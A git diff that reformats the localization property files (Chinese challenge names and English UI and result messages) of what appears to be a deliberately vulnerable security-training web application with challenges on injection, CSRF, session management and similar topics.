-insecure.direct.object.reference.challenge.1=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 1
-insecure.direct.object.reference.challenge.2=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 2
-insecure.direct.object.references=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
-nosql.injection.one=NoSQL \u6CE8\u5165 1
-poor.authentication=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
-poor.authentication.1=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1 1
-poor.data.validation=\u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1
-poor.data.validation.1=\u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 1
-poor.data.validation.2=\u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 2
-reverse.engineering=\u9006\u5411\u5DE5\u7A0B
-reverse.engineering.1=\u9006\u5411\u5DE5\u7A0B 1
-reverse.engineering.2=\u9006\u5411\u5DE5\u7A0B 2
-reverse.engineering.3=\u9006\u5411\u5DE5\u7A0B 3
-security.misconfig.cookie.flag=\u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931 Cookie \u6807\u5FD7
-security.misconfiguration=\u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
-session.management.challenge.1=\u4F1A\u8BDD\u7BA1\u7406 1
-session.management.challenge.2=\u4F1A\u8BDD\u7BA1\u7406 2
-session.management.challenge.3=\u4F1A\u8BDD\u7BA1\u7406 3
-session.management.challenge.4=\u4F1A\u8BDD\u7BA1\u7406 4
-session.management.challenge.5=\u4F1A\u8BDD\u7BA1\u7406 5
-session.management.challenge.6=\u4F1A\u8BDD\u7BA1\u7406 6
-session.management.challenge.7=\u4F1A\u8BDD\u7BA1\u7406 7
-session.management.challenge.8=\u4F1A\u8BDD\u7BA1\u7406 8
-sql.injection=SQL \u6CE8\u5165
-sql.injection.1=SQL \u6CE8\u5165 1
-sql.injection.2=SQL \u6CE8\u5165 2
-sql.injection.3=SQL \u6CE8\u5165 3
-sql.injection.4=SQL \u6CE8\u5165 4
-sql.injection.5=SQL \u6CE8\u5165 5
-sql.injection.6=SQL \u6CE8\u5165 6
-sql.injection.7=SQL \u6CE8\u5165 7
-sql.injection.escaping=SQL \u6CE8\u5165\u8F6C\u4E49
-sql.injection.stored.procedure=SQL \u6CE8\u5165\u50A8\u5B58\u7A0B\u5E8F
-unintended.data.leakage=\u610F\u5916\u6570\u636E\u6CC4\u6F0F
-unintended.data.leakage.1=\u610F\u5916\u6570\u636E\u6CC4\u6F0F 1
-unintended.data.leakage.2=\u610F\u5916\u6570\u636E\u6CC4\u6F0F 2
-unvalidated.redirects.and.forwards=\u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
-category.csrf=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
-category.failure.to.restrict.url.access=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
-category.injection=\u6CE8\u5165
-category.insecure.cryptographic.storage=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
-category.insecure.direct.object.references=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u5F15\u7528
-category.mobile.broken.crypto=\u79FB\u52A8\u52A0\u5BC6\u5931\u6548
-category.mobile.content.providers=Mobile Content Providers
-category.mobile.data.leakage=\u79FB\u52A8\u6570\u636E\u6CC4\u9732
-category.mobile.injection=\u79FB\u52A8\u6CE8\u5165
-category.mobile.insecure.data.storage=\u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
-category.mobile.poor.authentication=\u79FB\u52A8\u5931\u6548\u7684\u8BA4\u8BC1
-category.mobile.reverse.engineering=\u79FB\u52A8\u9006\u5411\u5DE5\u7A0B
-category.poor.data.validation=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
-category.security.misconfigurations=\u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
-category.session.management=\u4F1A\u8BDD\u7BA1\u7406
-category.unvalidated.redirects.and.forwards=\u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
-category.xss=\u8DE8\u7AD9\u811A\u672C (XSS)
+broken.crypto = \u5931\u6548\u52A0\u5BC6
+broken.crypto.1 = \u5931\u6548\u52A0\u5BC6 1
+broken.crypto.2 = \u5931\u6548\u52A0\u5BC6 2
+broken.crypto.3 = \u5931\u6548\u52A0\u5BC6 3
+broken.session.management = \u5931\u6548\u7684\u4F1A\u8BDD\u7BA1\u7406
+client.side.injection = \u5BA2\u6237\u7AEF\u6CE8\u5165
+client.side.injection.1 = \u5BA2\u6237\u7AEF\u6CE8\u5165 1
+client.side.injection.2 = \u5BA2\u6237\u7AEF\u6CE8\u5165 2
+content.provider.leakage = \u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F
+cross.site.request.forgery = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
+cross.site.scripting = \u8DE8\u7AD9\u811A\u672C (XSS)
+cross.site.scripting.1 = \u8DE8\u7AD9\u811A\u672C (XSS) 1
+cross.site.scripting.2 = \u8DE8\u7AD9\u811A\u672C (XSS)2
+cross.site.scripting.3 = \u8DE8\u7AD9\u811A\u672C (XSS)3
+cross.site.scripting.4 = \u8DE8\u7AD9\u811A\u672C (XSS)4
+cross.site.scripting.5 = \u8DE8\u7AD9\u811A\u672C (XSS)5
+cross.site.scripting.6 = \u8DE8\u7AD9\u811A\u672C (XSS)6
+csrf.1 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 1
+csrf.2 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 2
+csrf.3 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 3
+csrf.4 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 4
+csrf.5 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 5
+csrf.6 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 6
+csrf.7 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 7
+csrf.json = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 JSON (CSRF JSON)
+failure.to.restrict.url.access = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
+failure.to.restrict.url.access.1 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 1
+failure.to.restrict.url.access.2 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 2
+failure.to.restrict.url.access.3 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 3
+insecure.cryptographic.storage = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
+insecure.cryptographic.storage.challenge.1 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 1
+insecure.cryptographic.storage.challenge.2 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 2
+insecure.cryptographic.storage.challenge.3 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 3
+insecure.cryptographic.storage.challenge.4 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 4
+insecure.data.storage = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
+insecure.data.storage.1 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 1
+insecure.data.storage.2 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 2
+insecure.data.storage.3 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 3
+insecure.direct.object.reference.bank = \u94F6\u884C\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
+insecure.direct.object.reference.challenge.1 = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 1
+insecure.direct.object.reference.challenge.2 = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 2
+insecure.direct.object.references = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
+nosql.injection.one = NoSQL \u6CE8\u5165 1
+poor.authentication = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
+poor.authentication.1 = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1 1
+poor.data.validation = \u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1
+poor.data.validation.1 = \u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 1
+poor.data.validation.2 = \u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 2
+reverse.engineering = \u9006\u5411\u5DE5\u7A0B
+reverse.engineering.1 = \u9006\u5411\u5DE5\u7A0B 1
+reverse.engineering.2 = \u9006\u5411\u5DE5\u7A0B 2
+reverse.engineering.3 = \u9006\u5411\u5DE5\u7A0B 3
+security.misconfig.cookie.flag = \u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931 Cookie \u6807\u5FD7
+security.misconfiguration = \u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
+session.management.challenge.1 = \u4F1A\u8BDD\u7BA1\u7406 1
+session.management.challenge.2 = \u4F1A\u8BDD\u7BA1\u7406 2
+session.management.challenge.3 = \u4F1A\u8BDD\u7BA1\u7406 3
+session.management.challenge.4 = \u4F1A\u8BDD\u7BA1\u7406 4
+session.management.challenge.5 = \u4F1A\u8BDD\u7BA1\u7406 5
+session.management.challenge.6 = \u4F1A\u8BDD\u7BA1\u7406 6
+session.management.challenge.7 = \u4F1A\u8BDD\u7BA1\u7406 7
+session.management.challenge.8 = \u4F1A\u8BDD\u7BA1\u7406 8
+sql.injection = SQL \u6CE8\u5165
+sql.injection.1 = SQL \u6CE8\u5165 1
+sql.injection.2 = SQL \u6CE8\u5165 2
+sql.injection.3 = SQL \u6CE8\u5165 3
+sql.injection.4 = SQL \u6CE8\u5165 4
+sql.injection.5 = SQL \u6CE8\u5165 5
+sql.injection.6 = SQL \u6CE8\u5165 6
+sql.injection.7 = SQL \u6CE8\u5165 7
+sql.injection.escaping = SQL \u6CE8\u5165\u8F6C\u4E49
+sql.injection.stored.procedure = SQL \u6CE8\u5165\u50A8\u5B58\u7A0B\u5E8F
+unintended.data.leakage = \u610F\u5916\u6570\u636E\u6CC4\u6F0F
+unintended.data.leakage.1 = \u610F\u5916\u6570\u636E\u6CC4\u6F0F 1
+unintended.data.leakage.2 = \u610F\u5916\u6570\u636E\u6CC4\u6F0F 2
+unvalidated.redirects.and.forwards = \u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
+
+category.csrf = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
+category.failure.to.restrict.url.access = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
+category.injection = \u6CE8\u5165
+category.insecure.cryptographic.storage = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
+category.insecure.direct.object.references = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u5F15\u7528
+category.mobile.broken.crypto = \u79FB\u52A8\u52A0\u5BC6\u5931\u6548
+category.mobile.content.providers = Mobile Content Providers
+category.mobile.data.leakage = \u79FB\u52A8\u6570\u636E\u6CC4\u9732
+category.mobile.injection = \u79FB\u52A8\u6CE8\u5165
+category.mobile.insecure.data.storage = \u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
+category.mobile.poor.authentication = \u79FB\u52A8\u5931\u6548\u7684\u8BA4\u8BC1
+category.mobile.reverse.engineering = \u79FB\u52A8\u9006\u5411\u5DE5\u7A0B
+category.poor.data.validation = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
+category.security.misconfigurations = \u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
+category.session.management = \u4F1A\u8BDD\u7BA1\u7406
+category.unvalidated.redirects.and.forwards = \u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
+category.xss = \u8DE8\u7AD9\u811A\u672C (XSS)
diff --git a/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties b/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties
index bfbac349f..19f23095d 100644
--- a/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties
+++ b/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties
@@ -1,10 +1,12 @@
-target.noTokenNewToken=No CSRF Token Detected for this Challenge. Your token is now
-target.incrementSuccess=Increment Successful
-target.incrementFailed=Increment Failed
-target.noSession=No Session Detected
-forum.userName=User Name
-forum.image=Image
-forum.message=Message
-error.occurred=Sorry! An Error Occurred. Please contact administrator
-error.noClass=You must be assigned to a class to use this function. Please contact your administrator.
-error.noToken=Was unable to retrieve CSRF Token. Funky
+target.noTokenNewToken = No CSRF Token Detected for this Challenge. Your token is now
+target.incrementSuccess = Increment Successful
+target.incrementFailed = Increment Failed
+target.noSession = No Session Detected
+
+forum.userName = User Name
+forum.image = Image
+forum.message = Message
+
+error.occurred = Sorry! An Error Occurred. Please contact administrator
+error.noClass = You must be assigned to a class to use this function. Please contact your administrator.
+error.noToken = Was unable to retrieve CSRF Token. Funky
diff --git a/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties b/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties
index 270b1598c..e4f5aac4d 100644
--- a/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties
+++ b/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties
@@ -1,27 +1,32 @@
-login.authFailedMessage.1=ERROR: User
-login.authFailedMessage.2=could not be logged in
-login.error.couldNotGetBalance=Could not get Balance!
-bankForm.yourAccount=Your Account
-bankForm.yourAccount.balance=Your account balance is currently:
-bankForm.transferFunds=Transfer Funds
-bankForm.transferFunds.whatToDo=Use this form to send money to other accounts in this bank. All you need to do is enter their account number and the amount you want to send!
-bankForm.recieverNumber=Receiver Account Number:
-bankForm.amountToSend=Amount to Send:
-bankForm.loading=Loading...
-bankForm.refreshBalance=Refresh Balance
-bankForm.refreshBalance.whatToDo=Use this form to refresh your balance above. That way you can see if any money came in recently!
-bankForm.logoutOfAccount=Logout of Account
-bankForm.logoutOfAccount.whatToDo=Use this form to sign out of your bank account when your done giving your money away.
-bankForm.logoutFromBankAccount=Log Out Of Bank Account
-result.complete=Challenge Complete
-result.wellDone=Congratulations, you have successfully completed this challenge. Use the following result key at the top of the page to mark this level as complete in the system.
-result.theKeyIs=The result key for this challenge is
-logout.loggedOut=Logged Out
-register.accountCreated=User account has been registered! Please Sign in!
-register.error=Could not create account!
-transfer.error.couldNotTransfer=Could not get Transfer Funds!
-transfer.error.notEnoughCash=Your account does not have the necessary funds to transfer that amount.
-transfer.error.moreThanZero=The amount being transfered must be greater than zero.
-transfer.error.recieverNotFound=The receiver account specified could not be found
-transfer.error.occurred=An Error Occurred:
-transfer.success=Funds have been transfered successfully!
\ No newline at end of file
+login.authFailedMessage.1 = ERROR: User
+login.authFailedMessage.2 = could not be logged in
+login.error.couldNotGetBalance = Could not get Balance!
+
+bankForm.yourAccount = Your Account
+bankForm.yourAccount.balance = Your account balance is currently:
+bankForm.transferFunds = Transfer Funds
+bankForm.transferFunds.whatToDo = Use this form to send money to other accounts in this bank. All you need to do is enter their account number and the amount you want to send!
+bankForm.recieverNumber = Receiver Account Number:
+bankForm.amountToSend = Amount to Send:
+bankForm.loading = Loading...
+bankForm.refreshBalance = Refresh Balance
+bankForm.refreshBalance.whatToDo = Use this form to refresh your balance above. That way you can see if any money came in recently!
+bankForm.logoutOfAccount = Logout of Account
+bankForm.logoutOfAccount.whatToDo = Use this form to sign out of your bank account when your done giving your money away.
+bankForm.logoutFromBankAccount = Log Out Of Bank Account
+
+result.complete = Challenge Complete
+result.wellDone = Congratulations, you have successfully completed this challenge. Use the following result key at the top of the page to mark this level as complete in the system.
+result.theKeyIs = The result key for this challenge is
+
+logout.loggedOut = Logged Out
+
+register.accountCreated = User account has been registered! Please Sign in!
+register.error = Could not create account!
+
+transfer.error.couldNotTransfer = Could not get Transfer Funds!
+transfer.error.notEnoughCash = Your account does not have the necessary funds to transfer that amount.
+transfer.error.moreThanZero = The amount being transfered must be greater than zero.
+transfer.error.recieverNotFound = The receiver account specified could not be found
+transfer.error.occurred = An Error Occurred:
+transfer.success = Funds have been transfered successfully!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties
index d2a827b8e..ef746d2a9 100644
--- a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties
+++ b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties
@@ -1,4 +1,4 @@
-response.message=Message
-response.notFound=User: 404 - User Not Found
-response.notFoundMessage.1=User
-response.notFoundMessage.2=could not be found or does not exist.
\ No newline at end of file
+response.message = Message
+response.notFound = User: 404 - User Not Found
+response.notFoundMessage.1 = User
+response.notFoundMessage.2 = could not be found or does not exist.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties
index d2a827b8e..ef746d2a9 100644
--- a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties
+++ b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties
@@ -1,4 +1,4 @@
-response.message=Message
-response.notFound=User: 404 - User Not Found
-response.notFoundMessage.1=User
-response.notFoundMessage.2=could not be found or does not exist.
\ No newline at end of file
+response.message = Message
+response.notFound = User: 404 - User Not Found
+response.notFoundMessage.1 = User
+response.notFoundMessage.2 = could not be found or does not exist.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/injection/nosql.properties b/src/main/resources/i18n/servlets/challenges/injection/nosql.properties
index 91469e8ef..3598bb1dc 100644
--- a/src/main/resources/i18n/servlets/challenges/injection/nosql.properties
+++ b/src/main/resources/i18n/servlets/challenges/injection/nosql.properties
@@ -1,3 +1,3 @@
-results.queryResult=Mongodb Query Results
-result.none=There were no results found in your search
-result.mongoError=MongoDb Error caught -
\ No newline at end of file
+results.queryResult = Mongodb Query Results
+result.none = There were no results found in your search
+result.mongoError = MongoDb Error caught -
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties b/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties
index 6bc95c945..9a512bea0 100644
--- a/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties
+++ b/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties
@@ -1,3 +1,3 @@
-response.invalid.email=Invalid email address
-response.blank.email=Email must not be blank
-response.success.reset=The password has been reset for
\ No newline at end of file
+response.invalid.email = Invalid email address
+response.blank.email = Email must not be blank
+response.success.reset = The password has been reset for
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties b/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
index 5459d818a..ba498b4a1 100644
--- a/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
+++ b/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
@@ -1,16 +1,19 @@
-insecureCryptoStorage.3.plaintextResult=Plain text Result:
-insecureCryptoStorage.3.plaintextResult.message=Your cipher text was decrypted to the following:
-insecureCryptoStorage.4.orderComplete=Order Complete
-insecureCryptoStorage.4.orderShipped=Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
-insecureCryptoStorage.4.totalCost=Your order comes to a total of
-insecureCryptoStorage.4.freeOranges=Oranges were free, Well Done
-insecureCryptoStorage.4.orderFailed=Order Failed - Please try again later
-insecureCryptoStorage.homemade.badanswer=Incorrect Answer Submitted
-insecureCryptoStorage.homemade.badanswer.warning=That is not your user specific solution for 'This Challenge'. Please ensure you have discovered the correct key and can reproduce the above solutions before trying again.
-insecureCryptoStorage.homemade.badanswer.notLockedOut=You will get locked out from submissions if you continue to submit incorrect answers.
-insecureCryptoStorage.homemade.badanswer.lockedOut=You can no longer submit solutions.
-insecureCryptoStorage.homemade.nameTooShort=Name is too short
-result.wellDone=Well Done
-result.youDidIt=You successfully completed the challenge!
-result.resultKey=The result key for this challenge is
-result.failed=Something funky happened! Please try again!
\ No newline at end of file
+insecureCryptoStorage.3.plaintextResult = Plain text Result:
+insecureCryptoStorage.3.plaintextResult.message = Your cipher text was decrypted to the following:
+
+insecureCryptoStorage.4.orderComplete = Order Complete
+insecureCryptoStorage.4.orderShipped = Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
+insecureCryptoStorage.4.totalCost = Your order comes to a total of
+insecureCryptoStorage.4.freeOranges = Oranges were free, Well Done
+insecureCryptoStorage.4.orderFailed = Order Failed - Please try again later
+
+insecureCryptoStorage.homemade.badanswer = Incorrect Answer Submitted
+insecureCryptoStorage.homemade.badanswer.warning = That is not your user specific solution for 'This Challenge'. Please ensure you have discovered the correct key and can reproduce the above solutions before trying again.
+insecureCryptoStorage.homemade.badanswer.notLockedOut = You will get locked out from submissions if you continue to submit incorrect answers.
+insecureCryptoStorage.homemade.badanswer.lockedOut = You can no longer submit solutions.
+insecureCryptoStorage.homemade.nameTooShort = Name is too short
+
+result.wellDone = Well Done
+result.youDidIt = You successfully completed the challenge!
+result.resultKey = The result key for this challenge is
+result.failed = Something funky happened! Please try again!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties b/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties
index dc210ebd3..ef522492f 100644
--- a/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties
+++ b/src/main/resources/i18n/servlets/challenges/poorValidation/poorValidationStrings.properties
@@ -1,5 +1,5 @@
-poorValidation.orderComplete=Order Complete
-poorValidation.orderComplete.message=Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
-poorValidation.orderTotal=Your order comes to a total of
-poorValidation.freeOranges=Oranges were free, Well Done
-poorValidation.badOrder=Order Failed - Please try again later
\ No newline at end of file
+poorValidation.orderComplete = Order Complete
+poorValidation.orderComplete.message = Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
+poorValidation.orderTotal = Your order comes to a total of
+poorValidation.freeOranges = Oranges were free, Well Done
+poorValidation.badOrder = Order Failed - Please try again later
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties b/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties
index d09ed4af3..742799d70 100644
--- a/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties
+++ b/src/main/resources/i18n/servlets/challenges/securityMisconfig/stealTokens.properties
@@ -1,5 +1,5 @@
-securityMisconfig.servlet.stealTokens.notComplete=Challenge NOT Complete
-securityMisconfig.servlet.stealTokens.notComplete.message=You cannot complete this securityMisconfig.servlet.stealTokens with your cookie value. You must get the cookie from another user.
-securityMisconfig.servlet.stealTokens.notComplete.yourToken=You muse submit a valid token of another user to complete this securityMisconfig.servlet.stealTokens.
-securityMisconfig.servlet.stealTokens.complete=Challenge Complete
-securityMisconfig.servlet.stealTokens.youDidIt=Congratulations! Your result key is as follows
\ No newline at end of file
+securityMisconfig.servlet.stealTokens.notComplete = Challenge NOT Complete
+securityMisconfig.servlet.stealTokens.notComplete.message = You cannot complete this securityMisconfig.servlet.stealTokens with your cookie value. You must get the cookie from another user.
+securityMisconfig.servlet.stealTokens.notComplete.yourToken = You muse submit a valid token of another user to complete this securityMisconfig.servlet.stealTokens.
+securityMisconfig.servlet.stealTokens.complete = Challenge Complete
+securityMisconfig.servlet.stealTokens.youDidIt = Congratulations! Your result key is as follows
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties
index ddaab89e6..a96f4ab9e 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement1.properties
@@ -1,6 +1,6 @@
-response.adminClub=Admin Only Club
-response.welcomeAdmin=Welcome administrator. Your result key is as follows
-response.notAdmin=You're not an Admin!!!
-response.notAdminMessage=Stay away from the admin only section. The dogs have been released.
-response.hackDetected=HACK DETECTED
-response.hackDetectedMessage=A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
+response.adminClub = Admin Only Club
+response.welcomeAdmin = Welcome administrator. Your result key is as follows
+response.notAdmin = You're not an Admin!!!
+response.notAdminMessage = Stay away from the admin only section. The dogs have been released.
+response.hackDetected = HACK DETECTED
+response.hackDetectedMessage = A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties
index 15ef46f25..25c5e71cb 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement2.properties
@@ -1,8 +1,9 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.changedTo=Changed To:
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.changedTo = Changed To:
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties
index fbac92d44..3bd734bcb 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement3.properties
@@ -1,11 +1,13 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.welcomeGuest=Welcome Guest
-response.guestMessage=No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-reset.password=Password change request success.
-reset.failed=Change Password Failed.
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.welcomeGuest = Welcome Guest
+response.guestMessage = No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+reset.password = Password change request success.
+reset.failed = Change Password Failed.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties
index 6948cda18..133963d24 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement4.properties
@@ -1,6 +1,6 @@
-response.adminClub=Admin Only Club
-response.welcomeAdmin=Welcome administrator. Your result key is as follows
-response.notAdmin=You're not an Admin!!!
-response.notAdminMessage=Stay away from the admin only section. The wolves have been released.
-response.hackDetected=HACK DETECTED
-response.hackDetectedMessage=A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
+response.adminClub = Admin Only Club
+response.welcomeAdmin = Welcome administrator. Your result key is as follows
+response.notAdmin = You're not an Admin!!!
+response.notAdminMessage = Stay away from the admin only section. The wolves have been released.
+response.hackDetected = HACK DETECTED
+response.hackDetectedMessage = A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties
index b126c407f..9e690ddca 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement5.properties
@@ -1,18 +1,21 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.welcomeGuest=Welcome Guest
-response.guestMessage=No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-changePass.noDecode=Could not Decode Token
-changePass.badTokenData=Could not parse/manipulate date or time from token
-changePass.success=Password change request success.
-changePass.failure=Change Password Failed. Must be at least 12 characters.
-changePass.oldToken=Token is too old or none was submitted. Please get another one
-changePass.youngToken=Token is too young. Please get another and try again.
-changePass.funkyToken=Token is invalid (Too Funky). Please get another and try again.
-setToken.sentTo.1=URL with embedded password reset token has been sent to
